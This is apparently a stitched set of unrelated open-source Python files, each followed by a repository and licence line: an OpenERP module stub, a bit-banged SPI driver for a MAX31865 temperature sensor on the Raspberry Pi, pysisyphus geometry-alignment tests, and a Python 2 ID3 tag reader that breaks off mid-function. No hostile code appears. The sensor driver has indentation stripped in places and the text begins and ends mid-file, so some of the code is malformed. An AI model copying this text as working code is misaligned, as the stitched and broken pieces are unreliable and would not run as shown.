    if an IP address is private, both IPv4 and IPv6 are supported).
    """
| gratipay/aspen.py | pando/website.py | Python | mit | 9,310 |
# -*- coding: utf-8 -*-
# © 2014 Elico Corp (https://www.elico-corp.com)
# Licence AGPL-3.0 or later(http://www.gnu.org/licenses/agpl.html)
import stock_to_date
| Elico-Corp/openerp-7.0 | wms/wizard/__init__.py | Python | agpl-3.0 | 165 |
#!/usr/bin/python
#The MIT License (MIT)
#
#Copyright (c) 2015 Stephen P. Smith
#
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
import time, math
import RPi.GPIO as GPIO
#import numpy
class max31865(object):
"""Reading Temperature from the MAX31865 with GPIO using
the Raspberry Pi. Any pins can be used.
Numpy can be used to completely solve the Callendar-Van Dusen equation
but it slows the temp reading down. I commented it out in the code.
    The temperature is computed in two ways: with the quadratic formula
    (solving the Callendar-Van Dusen equation while ignoring its 3rd- and
    4th-degree polynomial terms) and with a straight-line approximation;
    the quadratic solution is the more accurate of the two.
"""
def __init__(self, csPin = 8, misoPin = 9, mosiPin = 10, clkPin = 11):
    """Store the BCM pin numbers for the bit-banged SPI bus and set up GPIO.

    The default calibration is the identity (no correction); call
    setCal() to calibrate against known reference resistances.
    """
    self.csPin = csPin      # chip select (active low)
    self.misoPin = misoPin  # data from the MAX31865
    self.mosiPin = mosiPin  # data to the MAX31865
    self.clkPin = clkPin    # SPI clock
    self.rRefCoeff = 1.0    # linear calibration gain
    self.rRefOffset = 0.0   # linear calibration offset (ohms)
    self.setupGPIO()
def setCal(self, rAt0C = 100.0, rAt100C = 138.51):
R0C_IDEAL = 100.0
R100C_IDEAL = 138.51
self.rRefCoeff = (R100C_IDEAL - R0C_IDEAL) / (rAt100C - rAt0C)
self.rRefOffset = R0C_IDEAL - self.rRefCoeff * rAt0C
# print ("m=%f b=%f"%(self.rRefCoeff, self.rRefOffset))
def setupGPIO(self):
    """Configure the four pins for software (bit-banged) SPI.
    CS idles high (chip deselected); clock and MOSI idle low."""
    GPIO.setwarnings(False)
    GPIO.setmode(GPIO.BCM)  # pin numbers are Broadcom GPIO numbers
    GPIO.setup(self.csPin, GPIO.OUT)
    GPIO.setup(self.misoPin, GPIO.IN)
    GPIO.setup(self.mosiPin, GPIO.OUT)
    GPIO.setup(self.clkPin, GPIO.OUT)
    GPIO.output(self.csPin, GPIO.HIGH)
    GPIO.output(self.clkPin, GPIO.LOW)
    GPIO.output(self.mosiPin, GPIO.LOW)
def readTemp(self):
    """Trigger a one-shot conversion and return the temperature in °C.

    Raises:
        FaultError: if the chip's status register reports a threshold or
        over/undervoltage fault.
    """
    #
    # b10000000 = 0x80
    # 0x8x to specify 'write register value'
    # 0xx0 to specify 'configuration register'
    #
    # 0b10110010 = 0xB2
    # Config Register
    # ---------------
    # bit 7: Vbias -> 1 (ON)
    # bit 6: Conversion Mode -> 0 (MANUAL)
    # bit 5: 1-shot -> 1 (ON)
    # bit 4: 3-wire select -> 1 (3 wire config)
    # bits 3-2: fault detection cycle -> 0 (none)
    # bit 1: fault status clear -> 1 (clear any fault)
    # bit 0: 50/60 Hz filter select -> 0 (60Hz)
    #
    # 0b11010010 or 0xD2 for continuous auto conversion
    # at 60Hz (faster conversion)
    #
    # one shot
    self.writeRegister(0, 0xB2)
    # Continuous
    # self.writeRegister(0, 0xD2)
    # conversion time is less than 100ms
    time.sleep(.1)  # give it 100ms for conversion
    # read all 8 registers in one burst
    out = self.readRegisters(0, 8)
    conf_reg = out[0]
    #print "config register byte: %x" % conf_reg
    [rtd_msb, rtd_lsb] = [out[1], out[2]]
    # 15-bit ratiometric RTD code (LSB of the 16-bit word is the fault bit)
    rtd_ADC_Code = ((rtd_msb << 8) | rtd_lsb) >> 1
    temp_C = self.calcPT100Temp(rtd_ADC_Code)
    [hft_msb, hft_lsb] = [out[3], out[4]]
    hft = ((hft_msb << 8) | hft_lsb) >> 1  # high fault threshold
    [lft_msb, lft_lsb] = [out[5], out[6]]
    lft = ((lft_msb << 8) | lft_lsb) >> 1  # low fault threshold
    status = out[7]
    #
    # 10 Mohm resistor is on breakout board to help
    # detect cable faults
    # bit 7: RTD High Threshold / cable fault open
    # bit 6: RTD Low Threshold / cable fault short
    # bit 5: REFIN- > 0.85 x VBias -> must be requested
    # bit 4: REFIN- < 0.85 x VBias (FORCE- open) -> must be requested
    # bit 3: RTDIN- < 0.85 x VBias (FORCE- open) -> must be requested
    # bit 2: Overvoltage / undervoltage fault
    # bits 1,0 don't care
    #
    # BUG FIX: the original tested '(status & 0x80) == 1'; a masked bit
    # yields the mask value (0x80/0x40/0x04), never 1, so faults were
    # silently ignored. Test truthiness of the masked bit instead.
    if status & 0x80:
        raise FaultError("High threshold limit (Cable fault/open)")
    if status & 0x40:
        raise FaultError("Low threshold limit (Cable fault/short)")
    if status & 0x04:
        raise FaultError("Overvoltage or Undervoltage Error")
    return temp_C
def writeRegister(self, regNum, dataByte):
    """Write one data byte to register *regNum* over bit-banged SPI."""
    GPIO.output(self.csPin, GPIO.LOW)   # select the chip
    # 0x8x to specify 'write register value'
    addressByte = 0x80 | regNum;
    # first byte is address byte
    self.sendByte(addressByte)
    # the rest are data bytes
    self.sendByte(dataByte)
    GPIO.output(self.csPin, GPIO.HIGH)  # deselect
def readRegisters(self, regNumStart, numRegisters):
    """Burst-read *numRegisters* bytes starting at register *regNumStart*.

    Returns the bytes as a list of ints.
    """
    out = []
    GPIO.output(self.csPin, GPIO.LOW)  # select the chip
    # 0x to specify 'read register value'
    self.sendByte(regNumStart)
    for byte in range(numRegisters):  # loop variable is only a counter
        data = self.recvByte()
        out.append(data)
    GPIO.output(self.csPin, GPIO.HIGH)  # deselect
    return out
def sendByte(self,byte):
    """Clock one byte out on MOSI, MSB first (software SPI)."""
    for bit in range(8):
        GPIO.output(self.clkPin, GPIO.HIGH)
        if (byte & 0x80):  # current most-significant bit
            GPIO.output(self.mosiPin, GPIO.HIGH)
        else:
            GPIO.output(self.mosiPin, GPIO.LOW)
        byte <<= 1  # shift the next bit into the MSB position
        GPIO.output(self.clkPin, GPIO.LOW)
def recvByte(self):
    """Clock one byte in from MISO, MSB first (software SPI)."""
    byte = 0x00
    for bit in range(8):
        GPIO.output(self.clkPin, GPIO.HIGH)
        byte <<= 1  # make room for the incoming bit
        if GPIO.input(self.misoPin):
            byte |= 0x1
        GPIO.output(self.clkPin, GPIO.LOW)
    return byte
def calcPT100Temp(self, RTD_ADC_Code):
R_REF = 400.0 # Reference Resistor
Res0 = 100.0; # Resistance at 0 degC for 400ohm R_Ref
a = .00390830
b = -.000000577500
# c = -4.18301e-12 # for -200 <= T <= 0 (degC)
c = -0.00000000000418301
# c = 0 # for 0 <= T <= 850 (degC)
#print "RTD ADC Code: %d" % RTD_ADC_Code
Res_RTD = (RTD_ADC_Code * R_REF) / 32768.0 # PT100 Resistance
#print "PT100 Resistance uncalibrated: %f ohms" % Res_RTD
Res_RTD = Res_RTD * self.rRefCoeff + self.rRefOffset
#print "PT100 Resistance calibrated: %f ohms" % Res_RTD
#
# Callendar-Van Dusen equation
# Res_RTD = Res0 * (1 + a*T + b*T**2 + c*(T-100)*T**3)
# Res_RTD = Res0 + a*Res0*T + b*Res0*T**2 # c = 0
# (c*Res0)T**4 - (c*Res0)*100*T**3
# + (b*Res0)*T**2 + (a*Res0)*T + (Res0 - Res_RTD) = 0
#
# quadratic formula:
# for 0 <= T <= 850 (degC)
temp_C = -(a*Res0) + math.sqrt(a*a*Res0*Res0 - 4*(b*Res0)*(Res0 - Res_RTD))
temp_C = temp_C / (2*(b*Res0))
temp_C_line = (RTD_ADC_Code/32.0) - 256.0
# removing numpy.roots will greatly speed things up
#temp_C_numpy = numpy.roots([c*Res0, -c*Res0*100, b*Res0, a*Res0, (Res0 - Res_RTD)])
#temp_C_numpy = abs(temp_C_numpy[-1])
#print "Straight Line Approx. Temp: %f degC" % temp_C_line
#print "Callendar-Van Dusen Temp (degC > 0): %f degC" % temp_C
#print "Solving Full Callendar-Van Dusen using numpy: %f" % temp_C_numpy
if (temp_C < 0): #use straight line approximation if less than 0
return temp_C_line
else:
return temp_C
def c_to_f(celsius):
    """Convert a temperature from degrees Celsius to degrees Fahrenheit."""
    return celsius * (9.0 / 5.0) + 32.0
class FaultError(Exception):
    """Raised by readTemp() when the MAX31865 status register reports a fault."""
    pass
if __name__ == "__main__":
    # Demo: continuously read and print the temperature until interrupted.
    import max31865
    csPin = 8
    misoPin = 9
    mosiPin = 10
    clkPin = 11
    # Renamed from 'max' so the builtin max() is not shadowed.
    sensor = max31865.max31865(csPin, misoPin, mosiPin, clkPin)
    sensor.setCal(95.104980, 127.539062)
    try:
        while True:
            tempC = sensor.readTemp()
            print("Temp is %f degrees C (%f F)"%(tempC, c_to_f(tempC)))
    finally:
        GPIO.cleanup()
| jwalthour/sensors | Pi/Python/max31865.py | Python | mit | 7,725 |
import numpy as np
from scipy.spatial.transform import Rotation
from pysisyphus.helpers import align_coords, geom_loader
from pysisyphus.interpolate import interpolate
def get_geoms(translate=0., euler=None):
    """Return (reference, transformed copy) of the benzene test geometry.

    The copy is translated by `translate` and, if `euler` is given,
    rotated by the corresponding XYZ Euler angles (degrees).
    """
    ref_geom = geom_loader("lib:benzene.xyz")
    moved_geom = ref_geom.copy()
    moved_geom.coords += translate
    coords = moved_geom.coords
    if euler:
        rotation = Rotation.from_euler("XYZ", euler, degrees=True)
        matrix = rotation.as_matrix()
        coords = np.array([row.dot(matrix) for row in coords.reshape(-1, 3)])
    moved_geom.coords = coords.flatten()
    return (ref_geom, moved_geom)
def test_align_coords_trans():
    """A pure translation must be removed entirely by align_coords."""
    ref, moved = get_geoms(translate=5.)
    coords_list = [g.coords for g in (ref, moved)]
    result = align_coords(coords_list)
    np.testing.assert_allclose(result[0], result[1])
def test_align_coords_trans_rot():
    """Translation plus rotation must be removed by align_coords."""
    ref, moved = get_geoms(translate=5., euler=(90, 45, 17))
    coords_list = [g.coords for g in (ref, moved)]
    result = align_coords(coords_list)
    np.testing.assert_allclose(result[0], result[1])
def test_align_coords_trans_rot_3d():
    """Same as the flat-coords case, but feeding (N, 3) coordinate arrays."""
    ref, moved = get_geoms(translate=5., euler=(90, 45, 17))
    coords_list = [g.coords3d for g in (ref, moved)]
    result = align_coords(coords_list)
    np.testing.assert_allclose(result[0], result[1])
def test_align_coords_interpolate():
    """Aligning an LST interpolation must map the first image onto the last."""
    endpoints = get_geoms(translate=5., euler=(0., 0., 90.))
    images = interpolate(*endpoints, 10, kind="lst")
    coords_list = [image.coords for image in images]
    result = align_coords(coords_list)
    np.testing.assert_allclose(result[0], result[-1], atol=1e-10)
| eljost/pysisyphus | tests/test_helpers/test_helpers.py | Python | gpl-3.0 | 1,842 |
""" Read ID3 tags from a file.
Ned Batchelder, http://nedbatchelder.com/code/modules/id3reader.html
http://nedbatchelder.com/code/modules/id3reader.py
* original code modified by ccpizza: added code to main method to rename
files in current folder from ID3 tags,
e.g. 'Track_01.mp3' >> '01 - Chan chan.mp3'
* added safe console printing of unicode characters
* added indexing for duplicate file names, i.e. '01 - Chan
chan.mp3[2]'
* fixed indexing for duplicated ID3 tags
* added -d option to create "artist\album" directories:
e.g. 'Track_01.mp3' >> 'Compay Segundo\Mojito\01 - Chan chan.mp3'
* added fallback to 'latin1' in case of non-unicode tag text
"""
__version__ = '1.53.20070415' # History at the end of the file.
# ID3 specs: http://www.id3.org/develop.html
import struct, sys, zlib
import re
# File extension appended when building new file names in the rename script.
MP3=u'mp3'
# These are the text encodings, indexed by the first byte of a text value.
_encodings = ['iso8859-1', 'utf-16', 'utf-16be', 'utf-8']
# Simple pseudo-id's, mapped to their various representations.
# Use these ids with getValue, and you don't need to know what
# version of ID3 the file contains.
_simpleDataMapping = {
    'album': ('TALB', 'TAL', 'v1album', 'TOAL'),
    'performer': ('TPE1', 'TP1', 'v1performer', 'TOPE'),
    'title': ('TIT2', 'TT2', 'v1title'),
    'track': ('TRCK', 'TRK', 'v1track'),
    'year': ('TYER', 'TYE', 'v1year'),
    'genre': ('TCON', 'TCO', 'v1genre'),
    'comment': ('COMM', 'COM', 'v1comment'),
}
# Provide booleans for older Pythons (pre-2.3, where True/False were absent).
try:
    True, False
except NameError:
    True, False = 1==1, 1==0
# Tracing: set _t to True to enable _trace() debug output.
_t = False
def _trace(msg):
    """Print a tracing message (only called when the _t flag is enabled)."""
    print msg
# Coverage: set _c to True to count how often each parser code path is hit.
_c = False
_features = {}
def _coverage(feat):
    """Increment the hit counter for the named code-path feature."""
    if feat not in _features:
        _features[feat] = 0
    _features[feat] += 1
def _safestr(s):
    """ Get a good string for printing, that won't throw exceptions,
    no matter what's in it.
    """
    # Coerce to unicode, then encode with the interpreter's default codec;
    # fall back to repr() so printing can never raise a UnicodeError.
    try:
        return unicode(s).encode(sys.getdefaultencoding())
    except UnicodeError:
        return '?: '+repr(s)
# Can I just say that I think the whole concept of genres is bogus,
# since they are so subjective? And the idea of letting someone else pick
# one of these things and then have it affect the categorization of my music
# is extra bogus. And the list itself is absurd. Polsk Punk?
# ID3v1 genre names, indexed by the single genre byte (valid range 0-147).
_genres = [
    # 0-19
    'Blues', 'Classic Rock', 'Country', 'Dance', 'Disco', 'Funk', 'Grunge', 'Hip - Hop', 'Jazz', 'Metal',
    'New Age', 'Oldies', 'Other', 'Pop', 'R&B', 'Rap', 'Reggae', 'Rock', 'Techno', 'Industrial',
    # 20-39
    'Alternative', 'Ska', 'Death Metal', 'Pranks', 'Soundtrack', 'Euro - Techno', 'Ambient', 'Trip - Hop', 'Vocal', 'Jazz + Funk',
    'Fusion', 'Trance', 'Classical', 'Instrumental', 'Acid', 'House', 'Game', 'Sound Clip', 'Gospel', 'Noise',
    # 40-59
    'Alt Rock', 'Bass', 'Soul', 'Punk', 'Space', 'Meditative', 'Instrumental Pop', 'Instrumental Rock', 'Ethnic', 'Gothic',
    'Darkwave', 'Techno - Industrial', 'Electronic', 'Pop - Folk', 'Eurodance', 'Dream', 'Southern Rock', 'Comedy', 'Cult', 'Gangsta Rap',
    # 60-79
    'Top 40', 'Christian Rap', 'Pop / Funk', 'Jungle', 'Native American', 'Cabaret', 'New Wave', 'Psychedelic', 'Rave', 'Showtunes',
    'Trailer', 'Lo - Fi', 'Tribal', 'Acid Punk', 'Acid Jazz', 'Polka', 'Retro', 'Musical', 'Rock & Roll', 'Hard Rock',
    # 80-99
    'Folk', 'Folk / Rock', 'National Folk', 'Swing', 'Fast - Fusion', 'Bebob', 'Latin', 'Revival', 'Celtic', 'Bluegrass',
    'Avantgarde', 'Gothic Rock', 'Progressive Rock', 'Psychedelic Rock', 'Symphonic Rock', 'Slow Rock', 'Big Band', 'Chorus', 'Easy Listening', 'Acoustic',
    # 100-119
    'Humour', 'Speech', 'Chanson', 'Opera', 'Chamber Music', 'Sonata', 'Symphony', 'Booty Bass', 'Primus', 'Porn Groove',
    'Satire', 'Slow Jam', 'Club', 'Tango', 'Samba', 'Folklore', 'Ballad', 'Power Ballad', 'Rhythmic Soul', 'Freestyle',
    # 120-139
    'Duet', 'Punk Rock', 'Drum Solo', 'A Cappella', 'Euro - House', 'Dance Hall', 'Goa', 'Drum & Bass', 'Club - House', 'Hardcore',
    'Terror', 'Indie', 'BritPop', 'Negerpunk', 'Polsk Punk', 'Beat', 'Christian Gangsta Rap', 'Heavy Metal', 'Black Metal', 'Crossover',
    # 140-147
    'Contemporary Christian', 'Christian Rock', 'Merengue', 'Salsa', 'Thrash Metal', 'Anime', 'JPop', 'Synthpop'
]
class Id3Error(Exception):
    """Raised when id3reader encounters a malformed or unreadable ID3 tag."""
class _Header:
    """The ID3 header block at the start of a tag: version, flags, size."""
    def __init__(self):
        # Numeric fields are zero until parsed from the file.
        self.majorVersion = self.revision = self.flags = self.size = 0
        # Booleans decoded from the header flags byte.
        self.bUnsynchronized = self.bExperimental = self.bFooter = False
    def __str__(self):
        return str(self.__dict__)
class _Frame:
    """ Represent an ID3 frame in a tag.
    """
    def __init__(self):
        # Frame id (e.g. 'TIT2'), raw size/flags, and undecoded payload.
        self.id = ''
        self.size = 0
        self.flags = 0
        self.rawData = ''
        # Flag booleans decoded from the frame header flags word.
        self.bTagAlterPreserve = False
        self.bFileAlterPreserve = False
        self.bReadOnly = False
        self.bCompressed = False
        self.bEncrypted = False
        self.bInGroup = False
    def __str__(self):
        return str(self.__dict__)
    def __repr__(self):
        return str(self.__dict__)
    def _interpret(self):
        """ Examine self.rawData and create a self.value from it.
        """
        if len(self.rawData) == 0:
            # This is counter to the spec, but seems harmless enough.
            #if _c: _coverage('zero data')
            return
        if self.bCompressed:
            # Decompress the compressed data.
            self.rawData = zlib.decompress(self.rawData)
        if self.id[0] == 'T':
            # Text fields start with T; first byte selects the text encoding.
            encoding = ord(self.rawData[0])
            if 0 <= encoding < len(_encodings):
                #if _c: _coverage('encoding%d' % encoding)
                value = self.rawData[1:].decode(_encodings[encoding])
            else:
                # Unknown encoding byte: keep the raw (undecoded) payload.
                #if _c: _coverage('bad encoding')
                value = self.rawData[1:]
            # Don't let trailing zero bytes fool you.
            if value:
                value = value.strip('\0')
            # The value can actually be a list.
            if '\0' in value:
                value = value.split('\0')
                #if _c: _coverage('textlist')
            self.value = value
        elif self.id[0] == 'W':
            # URL fields start with W
            self.value = self.rawData.strip('\0')
            if self.id == 'WXXX':
                # WXXX carries a description and a URL, NUL-separated.
                self.value = self.value.split('\0')
        elif self.id == 'CDM':
            # ID3v2.2.1 Compressed Data Metaframe
            if self.rawData[0] == 'z':
                self.rawData = zlib.decompress(self.rawData[5:])
            else:
                #if _c: _coverage('badcdm!')
                raise Id3Error, 'Unknown CDM compression: %02x' % self.rawData[0]
            #@TODO: re-interpret the decompressed frame.
        elif self.id in _simpleDataMapping['comment']:
            # comment field
            # In limited testing a typical comment looks like
            # '\x00XXXID3v1 Comment\x00comment test' so in this
            # case we need to find the second \x00 to know where
            # where we start for a comment. In case we only find
            # one \x00, lets just start at the beginning for the
            # value
            s = str(self.rawData)
            pos = 0
            count = 0
            # Scan forward past the second NUL (encoding byte + language +
            # description precede the actual comment text).
            while pos < len(s) and count < 2:
                if ord(s[pos]) == 0:
                    count = count + 1
                pos = pos + 1
            if count < 2:
                pos = 1
            if pos > 0 and pos < len(s):
                s = s[pos:]
                if ord(s[-1]) == 0:
                    s = s[:-1]
            self.value = s
class Reader:
    """ An ID3 reader.
        Create one on a file object, and then use getValue('TIT2') (for example)
        to pull values.
    """
    def __init__(self, file):
        """ Create a reader from a file or filename. """
        self.file = file
        self.header = None
        self.frames = {}        # frame id -> last _Frame seen with that id
        self.allFrames = []     # every frame, in file order
        self.bytesLeft = 0      # bytes remaining in the tag being parsed
        self.padbytes = ''
        bCloseFile = False
        # If self.file is a string of some sort, then open it to get a file.
        if isinstance(self.file, (type(''), type(u''))):
            self.file = open(self.file, 'rb')
            bCloseFile = True
        self._readId3()
        if bCloseFile:
            self.file.close()
    def _readBytes(self, num, desc=''):
        """ Read some bytes from the file.
            This method implements the "unsynchronization" scheme,
            where 0xFF bytes may have had 0x00 bytes stuffed after
            them. These zero bytes have to be removed transparently.
        """
        #if _t: _trace("ask %d (%s)" % (num,desc))
        if num > self.bytesLeft:
            #if _c: _coverage('long!')
            raise Id3Error, 'Long read (%s): (%d > %d)' % (desc, num, self.bytesLeft)
        bytes = self.file.read(num)
        self.bytesLeft -= num
        if len(bytes) < num:
            #if _t: _trace("short read with %d left, %d total" % (self.bytesLeft, self.header.size))
            #if _c: _coverage('short!')
            raise Id3Error, 'Short read (%s): (%d < %d)' % (desc, len(bytes), num)
        if self.header.bUnsynchronized:
            nUnsync = 0
            i = 0
            while True:
                # Each 0xFF 0x00 pair had a zero stuffed by the writer.
                i = bytes.find('\xFF\x00', i)
                if i == -1:
                    break
                #if _t: _trace("unsync at %d" % (i+1))
                #if _c: _coverage('unsyncbyte')
                nUnsync += 1
                # This is a stuffed byte to remove
                bytes = bytes[:i+1] + bytes[i+2:]
                # Have to read one more byte from the file to adjust
                bytes += self.file.read(1)
                self.bytesLeft -= 1
                i += 1
            #if _t: _trace("unsync'ed %d" % (nUnsync))
        return bytes
    def _unreadBytes(self, num):
        """Push num bytes back onto the file (relative seek backwards)."""
        self.file.seek(-num, 1)
        self.bytesLeft += num
    def _getSyncSafeInt(self, bytes):
        """Decode a 4-byte sync-safe integer (7 significant bits per byte)."""
        assert len(bytes) == 4
        if type(bytes) == type(''):
            bytes = [ ord(c) for c in bytes ]
        return (bytes[0] << 21) + (bytes[1] << 14) + (bytes[2] << 7) + bytes[3]
    def _getInteger(self, bytes):
        """Decode a big-endian integer from a byte string or byte list."""
        i = 0;
        if type(bytes) == type(''):
            bytes = [ ord(c) for c in bytes ]
        for b in bytes:
            i = i*256+b
        return i
    def _addV1Frame(self, id, rawData):
        """Record an ID3v1 pseudo-frame (ids like 'v1title', 'v1genre')."""
        if id == 'v1genre':
            assert len(rawData) == 1
            nGenre = ord(rawData)
            try:
                value = _genres[nGenre]
            except IndexError:
                # Unknown genre byte: keep the number, parenthesized.
                value = "(%d)" % nGenre
        else:
            # Trim padding and keep only the text before the first NUL.
            value = rawData.strip(' \t\r\n').split('\0')[0]
        if value:
            frame = _Frame()
            frame.id = id
            frame.rawData = rawData
            frame.value = value
            self.frames[id] = frame
            self.allFrames.append(frame)
    def _pass(self):
        """ Do nothing, for when we need to plug in a no-op function.
        """
        pass
    def _readId3(self):
        """Parse the tag: dispatch on ID3v2 major version, or fall back to v1."""
        header = self.file.read(10)
        if len(header) < 10:
            return
        hstuff = struct.unpack('!3sBBBBBBB', header)
        if hstuff[0] != "ID3":
            # Doesn't look like an ID3v2 tag,
            # Try reading an ID3v1 tag.
            self._readId3v1()
            return
        self.header = _Header()
        self.header.majorVersion = hstuff[1]
        self.header.revision = hstuff[2]
        self.header.flags = hstuff[3]
        self.header.size = self._getSyncSafeInt(hstuff[4:8])
        self.bytesLeft = self.header.size
        self._readExtHeader = self._pass
        if self.header.majorVersion == 2:
            #if _c: _coverage('id3v2.2.%d' % self.header.revision)
            self._readFrame = self._readFrame_rev2
        elif self.header.majorVersion == 3:
            #if _c: _coverage('id3v2.3.%d' % self.header.revision)
            self._readFrame = self._readFrame_rev3
        elif self.header.majorVersion == 4:
            #if _c: _coverage('id3v2.4.%d' % self.header.revision)
            self._readFrame = self._readFrame_rev4
        else:
            #if _c: _coverage('badmajor!')
            raise Id3Error, "Unsupported major version: %d" % self.header.majorVersion
        # Interpret the flags
        self._interpretFlags()
        # Read any extended header
        self._readExtHeader()
        # Read the frames
        while self.bytesLeft > 0:
            frame = self._readFrame()
            if frame:
                frame._interpret()
                self.frames[frame.id] = frame
                self.allFrames.append(frame)
            else:
                # A non-frame means we've hit the tag's zero padding.
                #if _c: _coverage('padding')
                break
    def _interpretFlags(self):
        """ Interpret ID3v2.x flags.
        """
        if self.header.flags & 0x80:
            self.header.bUnsynchronized = True
            #if _c: _coverage('unsynctag')
        if self.header.majorVersion == 2:
            if self.header.flags & 0x40:
                #if _c: _coverage('compressed')
                # "Since no compression scheme has been decided yet,
                # the ID3 decoder (for now) should just ignore the entire
                # tag if the compression bit is set."
                self.header.bCompressed = True
        if self.header.majorVersion >= 3:
            if self.header.flags & 0x40:
                #if _c: _coverage('extheader')
                if self.header.majorVersion == 3:
                    self._readExtHeader = self._readExtHeader_rev3
                else:
                    self._readExtHeader = self._readExtHeader_rev4
            if self.header.flags & 0x20:
                #if _c: _coverage('experimental')
                self.header.bExperimental = True
        if self.header.majorVersion >= 4:
            if self.header.flags & 0x10:
                #if _c: _coverage('footer')
                self.header.bFooter = True
    def _readExtHeader_rev3(self):
        """ Read the ID3v2.3 extended header.
        """
        # We don't interpret this yet, just eat the bytes.
        size = self._getInteger(self._readBytes(4, 'rev3ehlen'))
        self._readBytes(size, 'rev3ehdata')
    def _readExtHeader_rev4(self):
        """ Read the ID3v2.4 extended header.
        """
        # We don't interpret this yet, just eat the bytes.
        # In v2.4 the size field is sync-safe and includes its own 4 bytes.
        size = self._getSyncSafeInt(self._readBytes(4, 'rev4ehlen'))
        self._readBytes(size-4, 'rev4ehdata')
    def _readId3v1(self):
        """ Read the ID3v1 tag.
            spec: http://www.id3.org/id3v1.html
        """
        # The v1 tag is the fixed 128 bytes at the very end of the file.
        self.file.seek(-128, 2)
        tag = self.file.read(128)
        if len(tag) != 128:
            return
        if tag[0:3] != 'TAG':
            return
        self.header = _Header()
        self.header.majorVersion = 1
        self.header.revision = 0
        self._addV1Frame('v1title', tag[3:33])
        self._addV1Frame('v1performer', tag[33:63])
        self._addV1Frame('v1album', tag[63:93])
        self._addV1Frame('v1year', tag[93:97])
        self._addV1Frame('v1comment', tag[97:127])
        self._addV1Frame('v1genre', tag[127])
        # ID3v1.1: a zero at byte 125 plus a nonzero byte 126 means the
        # last comment byte actually holds the track number.
        if tag[125] == '\0' and tag[126] != '\0':
            #if _c: _coverage('id3v1.1')
            self.header.revision = 1
            self._addV1Frame('v1track', str(ord(tag[126])))
        else:
            #if _c: _coverage('id3v1.0')
            pass
        return
    # Characters permitted in an ID3v2 frame id.
    _validIdChars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
    def _isValidId(self, id):
        """ Determine if the id bytes make a valid ID3 id.
        """
        for c in id:
            if not c in self._validIdChars:
                #if _c: _coverage('bad id')
                return False
        #if _c: _coverage('id '+id)
        return True
    def _readFrame_rev2(self):
        """ Read a frame for ID3v2.2: three-byte ids and lengths.
            spec: http://www.id3.org/id3v2-00.txt
        """
        if self.bytesLeft < 6:
            return None
        id = self._readBytes(3, 'rev2id')
        if len(id) < 3 or not self._isValidId(id):
            # Not a frame id: un-read and let the caller treat it as padding.
            self._unreadBytes(len(id))
            return None
        hstuff = struct.unpack('!BBB', self._readBytes(3, 'rev2len'))
        frame = _Frame()
        frame.id = id
        frame.size = self._getInteger(hstuff[0:3])
        frame.rawData = self._readBytes(frame.size, 'rev2data')
        return frame
    def _readFrame_rev3(self):
        """ Read a frame for ID3v2.3: four-byte ids and lengths.
        """
        if self.bytesLeft < 10:
            return None
        id = self._readBytes(4,'rev3id')
        if len(id) < 4 or not self._isValidId(id):
            self._unreadBytes(len(id))
            return None
        hstuff = struct.unpack('!BBBBh', self._readBytes(6,'rev3head'))
        frame = _Frame()
        frame.id = id
        frame.size = self._getInteger(hstuff[0:4])
        cbData = frame.size
        frame.flags = hstuff[4]
        #if _t: _trace('flags = %x' % frame.flags)
        frame.bTagAlterPreserve = (frame.flags & 0x8000 != 0)
        frame.bFileAlterPreserve = (frame.flags & 0x4000 != 0)
        frame.bReadOnly = (frame.flags & 0x2000 != 0)
        frame.bCompressed = (frame.flags & 0x0080 != 0)
        # Optional extra header bytes reduce the remaining data length.
        if frame.bCompressed:
            frame.decompressedSize = self._getInteger(self._readBytes(4, 'decompsize'))
            cbData -= 4
            #if _c: _coverage('compress')
        frame.bEncrypted = (frame.flags & 0x0040 != 0)
        if frame.bEncrypted:
            frame.encryptionMethod = self._readBytes(1, 'encrmethod')
            cbData -= 1
            #if _c: _coverage('encrypt')
        frame.bInGroup = (frame.flags & 0x0020 != 0)
        if frame.bInGroup:
            frame.groupid = self._readBytes(1, 'groupid')
            cbData -= 1
            #if _c: _coverage('groupid')
        frame.rawData = self._readBytes(cbData, 'rev3data')
        return frame
    def _readFrame_rev4(self):
        """ Read a frame for ID3v2.4: four-byte ids and lengths.
        """
        if self.bytesLeft < 10:
            return None
        id = self._readBytes(4,'rev4id')
        if len(id) < 4 or not self._isValidId(id):
            self._unreadBytes(len(id))
            return None
        hstuff = struct.unpack('!BBBBh', self._readBytes(6,'rev4head'))
        frame = _Frame()
        frame.id = id
        # v2.4 frame sizes are sync-safe, unlike v2.3.
        frame.size = self._getSyncSafeInt(hstuff[0:4])
        cbData = frame.size
        frame.flags = hstuff[4]
        frame.bTagAlterPreserve = (frame.flags & 0x4000 != 0)
        frame.bFileAlterPreserve = (frame.flags & 0x2000 != 0)
        frame.bReadOnly = (frame.flags & 0x1000 != 0)
        frame.bInGroup = (frame.flags & 0x0040 != 0)
        if frame.bInGroup:
            frame.groupid = self._readBytes(1, 'groupid')
            cbData -= 1
            #if _c: _coverage('groupid')
        frame.bCompressed = (frame.flags & 0x0008 != 0)
        if frame.bCompressed:
            #if _c: _coverage('compress')
            pass
        frame.bEncrypted = (frame.flags & 0x0004 != 0)
        if frame.bEncrypted:
            frame.encryptionMethod = self._readBytes(1, 'encrmethod')
            cbData -= 1
            #if _c: _coverage('encrypt')
        frame.bUnsynchronized = (frame.flags & 0x0002 != 0)
        if frame.bUnsynchronized:
            #if _c: _coverage('unsyncframe')
            pass
        if frame.flags & 0x0001:
            # Data-length indicator present.
            frame.datalen = self._getSyncSafeInt(self._readBytes(4, 'datalen'))
            cbData -= 4
